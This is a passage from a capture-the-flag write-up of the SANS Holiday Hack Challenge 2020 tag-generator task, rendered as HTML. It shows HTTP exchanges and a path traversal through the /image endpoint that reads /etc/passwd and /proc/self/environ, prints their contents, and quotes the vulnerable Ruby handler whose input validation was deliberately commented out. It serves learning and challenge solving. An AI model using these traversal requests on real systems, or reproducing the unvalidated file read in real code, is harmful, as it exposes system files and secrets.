&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.14.2&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Wed, 30 Dec 2020 11:10:27 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;text/html;charset=utf-8&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;49&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;X-XSS-Protection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;1; mode=block&lt;/span&gt;
&lt;span class="na"&gt;X-Content-Type-Options&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nosniff&lt;/span&gt;
&lt;span class="na"&gt;X-Frame-Options&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;SAMEORIGIN&lt;/span&gt;
&lt;span class="na"&gt;Strict-Transport-Security&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;max-age=15552000; includeSubDomains&lt;/span&gt;
&lt;span class="na"&gt;X-XSS-Protection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;1; mode=block&lt;/span&gt;
&lt;span class="na"&gt;X-Robots-Tag&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;none&lt;/span&gt;
&lt;span class="na"&gt;X-Download-Options&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;noopen&lt;/span&gt;
&lt;span class="na"&gt;X-Permitted-Cross-Domain-Policies&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;none&lt;/span&gt;

{&amp;quot;id&amp;quot;:&amp;quot;4a707baab164e15f58d7365c70a480e1d624b253&amp;quot;}
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;GET&lt;/span&gt; &lt;span class="nn"&gt;/share?id=4a707baab164e15f58d7365c70a480e1d624b253&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;tag-generator.kringlecastle.com&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8&lt;/span&gt;
&lt;span class="na"&gt;Accept-Language&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip, deflate&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Referer&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://tag-generator.kringlecastle.com/&lt;/span&gt;
&lt;span class="na"&gt;Upgrade-Insecure-Requests&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;1&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.14.2&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Wed, 30 Dec 2020 11:10:28 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;text/html;charset=utf-8&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;1479&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;X-XSS-Protection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;1; mode=block&lt;/span&gt;
&lt;span class="na"&gt;X-Content-Type-Options&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nosniff&lt;/span&gt;
&lt;span class="na"&gt;X-Frame-Options&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;SAMEORIGIN&lt;/span&gt;
&lt;span class="na"&gt;Strict-Transport-Security&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;max-age=15552000; includeSubDomains&lt;/span&gt;
&lt;span class="na"&gt;X-XSS-Protection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;1; mode=block&lt;/span&gt;
&lt;span class="na"&gt;X-Robots-Tag&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;none&lt;/span&gt;
&lt;span class="na"&gt;X-Download-Options&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;noopen&lt;/span&gt;
&lt;span class="na"&gt;X-Permitted-Cross-Domain-Policies&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;none&lt;/span&gt;

&lt;span class="cp"&gt;&amp;lt;!DOCTYPE html&amp;gt;&lt;/span&gt;
&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;html&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
[snip]
&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;body&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
  &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;div&lt;/span&gt; &lt;span class="na"&gt;class&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;parentElement&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="hll"&gt;    &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;img&lt;/span&gt; &lt;span class="na"&gt;class&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;hero&amp;quot;&lt;/span&gt; &lt;span class="na"&gt;src&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;/image?id=4a707baab164e15f58d7365c70a480e1d624b253.png&amp;quot;&lt;/span&gt; &lt;span class="p"&gt;/&amp;gt;&lt;/span&gt;
&lt;/span&gt;    &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;label&lt;/span&gt; &lt;span class="na"&gt;for&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;copyUrl&amp;quot;&lt;/span&gt; &lt;span class="na"&gt;class&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;share-label&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;Share URL: &lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;label&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;input&lt;/span&gt; &lt;span class="na"&gt;class&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;copyUrl&amp;quot;&lt;/span&gt; &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;%%currenturl%%&amp;quot;&lt;/span&gt; &lt;span class="p"&gt;/&amp;gt;&lt;/span&gt;
  &lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;div&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
  &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;script&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;copyUrl&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;document&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;querySelector&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;.copyUrl&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="nx"&gt;copyUrl&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;value&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;window&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;location&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;script&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;body&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;html&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;I tried several attacks on both these functionalities. For example, I tried
to forcefully send an SVG file via the &lt;code&gt;/save&lt;/code&gt; endpoint, but it didn't
work. Then I tried a bunch of stuff with the &lt;code&gt;/share&lt;/code&gt; endpoint, mainly
dealing with the fact that the generated id for the image didn't have the same
format as the one generated with &lt;code&gt;/upload&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Anyway, nothing worked, and that's about where I gave up, and asked Holly
Evergreen for help.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="the-right-solution"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id39"&gt;The right solution&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;Holly told me that if I managed to recover the source for the application, it
would be easier to find vulnerabilities. I was like &amp;quot;Yeah, no kidding, Holly!
I already tried to get the source code via ImageMagick.&amp;quot; But then she said
that maybe one of the functionalities could be exploited to do so, and that's
when I rememberd the &lt;code&gt;/image&lt;/code&gt; functionality that had such a strange
behaviour.&lt;/p&gt;
&lt;p&gt;It turns out that you can abuse &lt;code&gt;/image&lt;/code&gt; to download any file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;GET&lt;/span&gt; &lt;span class="nn"&gt;/image?id=../etc/passwd&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;tag-generator.kringlecastle.com&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;image/webp,*/*&lt;/span&gt;
&lt;span class="na"&gt;Accept-Language&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip, deflate&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Referer&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://tag-generator.kringlecastle.com/&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.14.2&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Wed, 30 Dec 2020 16:09:36 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;image/jpeg&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;966&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;X-Content-Type-Options&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nosniff&lt;/span&gt;
&lt;span class="na"&gt;Strict-Transport-Security&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;max-age=15552000; includeSubDomains&lt;/span&gt;
&lt;span class="na"&gt;X-XSS-Protection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;1; mode=block&lt;/span&gt;
&lt;span class="na"&gt;X-Robots-Tag&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;none&lt;/span&gt;
&lt;span class="na"&gt;X-Download-Options&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;noopen&lt;/span&gt;
&lt;span class="na"&gt;X-Permitted-Cross-Domain-Policies&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;none&lt;/span&gt;

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
app:x:1000:1000:,,,:/home/app:/bin/bash
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Anywaaaaaay... Now that we can read any file, we can get the value for the
environment variable &lt;code&gt;GREETZ&lt;/code&gt;, for example by reading
&lt;code&gt;/proc/self/environ&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;GET&lt;/span&gt; &lt;span class="nn"&gt;/image?id=../proc/self/environ&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;tag-generator.kringlecastle.com&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;image/webp,*/*&lt;/span&gt;
&lt;span class="na"&gt;Accept-Language&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip, deflate&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Referer&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://tag-generator.kringlecastle.com/&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.14.2&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Wed, 30 Dec 2020 16:12:12 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;image/jpeg&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;399&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;X-Content-Type-Options&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nosniff&lt;/span&gt;
&lt;span class="na"&gt;Strict-Transport-Security&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;max-age=15552000; includeSubDomains&lt;/span&gt;
&lt;span class="na"&gt;X-XSS-Protection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;1; mode=block&lt;/span&gt;
&lt;span class="na"&gt;X-Robots-Tag&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;none&lt;/span&gt;
&lt;span class="na"&gt;X-Download-Options&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;noopen&lt;/span&gt;
&lt;span class="na"&gt;X-Permitted-Cross-Domain-Policies&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;none&lt;/span&gt;

PATH=/usr/local/bundle/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binHOSTNAME=cbf2810b7573RUBY_MAJOR=2.7RUBY_VERSION=2.7.0RUBY_DOWNLOAD_SHA256=27d350a52a02b53034ca0794efe518667d558f152656c2baaf08f3d0c8b02343GEM_HOME=/usr/local/bundleBUNDLE_SILENCE_ROOT_WARNING=1BUNDLE_APP_CONFIG=/usr/local/bundleAPP_HOME=/appPORT=4141HOST=0.0.0.0GREETZ=JackFrostWasHereHOME=/home/app
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can see that &lt;code&gt;GREETZ=JackFrostWasHere&lt;/code&gt;. And bam, we don't even have to
read the source code to answer the question!&lt;/p&gt;
&lt;p&gt;But let's do it anyway, because it's fun. So, with our vulnerability, we can
read the &lt;code&gt;/app/lib/app.rb&lt;/code&gt; file. You can download a copy of it &lt;a class="reference external" href="/docs/sans-christmas-challenge-2020/app.rb"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;First, let's take a look at the vulnerable &lt;code&gt;/image&lt;/code&gt; endpoint:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="n"&gt;get&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;/image&amp;#39;&lt;/span&gt; &lt;span class="k"&gt;do&lt;/span&gt;
  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;params&lt;/span&gt;&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;id&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt;
    &lt;span class="k"&gt;raise&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;ID is missing!&amp;#39;&lt;/span&gt;
  &lt;span class="k"&gt;end&lt;/span&gt;

&lt;span class="hll"&gt;  &lt;span class="c1"&gt;# Validation is boring! --Jack&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;  &lt;span class="c1"&gt;# if params[&amp;#39;id&amp;#39;] !~ /^[a-zA-Z0-9._-]+$/&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;  &lt;span class="c1"&gt;#   return 400, &amp;#39;Invalid id! id may contain letters, numbers, period, underscore, and hyphen&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;  &lt;span class="c1"&gt;# end&lt;/span&gt;
&lt;/span&gt;
  &lt;span class="n"&gt;content_type&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;image/jpeg&amp;#39;&lt;/span&gt;

&lt;span class="hll"&gt;  &lt;span class="n"&gt;filename&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;&lt;span class="si"&gt;#{&lt;/span&gt; &lt;span class="no"&gt;FINAL_FOLDER&lt;/span&gt; &lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;/&lt;/span&gt;&lt;span class="si"&gt;#{&lt;/span&gt; &lt;span class="n"&gt;params&lt;/span&gt;&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;id&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; &lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;
&lt;/span&gt;
  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="no"&gt;File&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;exists?&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="hll"&gt;    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="no"&gt;File&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;read&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;  &lt;span class="k"&gt;else&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;404&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;Image not found!&amp;quot;&lt;/span&gt;
  &lt;span class="k"&gt;end&lt;/span&gt;
&lt;span class="k"&gt;end&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can see that the file name validation was commented by Jack Frost. So our
&lt;code&gt;id&lt;/code&gt; parameter is used as is, which allows us to perform path traversal
and read any file we want on the system (readable by the webserver of course).&lt;/p&gt;
&lt;p&gt;Now, let's take a look at the &lt;code&gt;/upload&lt;/code&gt; functionality:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="n"&gt;post&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;/upload&amp;#39;&lt;/span&gt; &lt;span class="k"&gt;do&lt;/span&gt;
  &lt;span class="n"&gt;images&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;[]&lt;/span&gt;
  &lt;span class="n"&gt;images&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="n"&gt;process_files&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;params&lt;/span&gt;&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;my_file&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;].&lt;/span&gt;&lt;span class="n"&gt;map&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt;&lt;span class="nb"&gt;p&lt;/span&gt;&lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;p&lt;/span&gt;&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;tempfile&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;].&lt;/span&gt;&lt;span class="n"&gt;path&lt;/span&gt; &lt;span class="p"&gt;})&lt;/span&gt;
  &lt;span class="n"&gt;images&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;sort!&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
  &lt;span class="n"&gt;images&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;uniq!&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

  &lt;span class="n"&gt;content_type&lt;/span&gt; &lt;span class="ss"&gt;:json&lt;/span&gt;
  &lt;span class="n"&gt;images&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;to_json&lt;/span&gt;
&lt;span class="k"&gt;end&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The files are uploaded in a temporary folder, and are passed as an argument to
&lt;code&gt;process_files&lt;/code&gt;. The results are then sorted, duplicates are removed, and
then everything is sent to the user. Let's keep digging, by looking at
&lt;code&gt;process_files&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;process_files&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;files&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
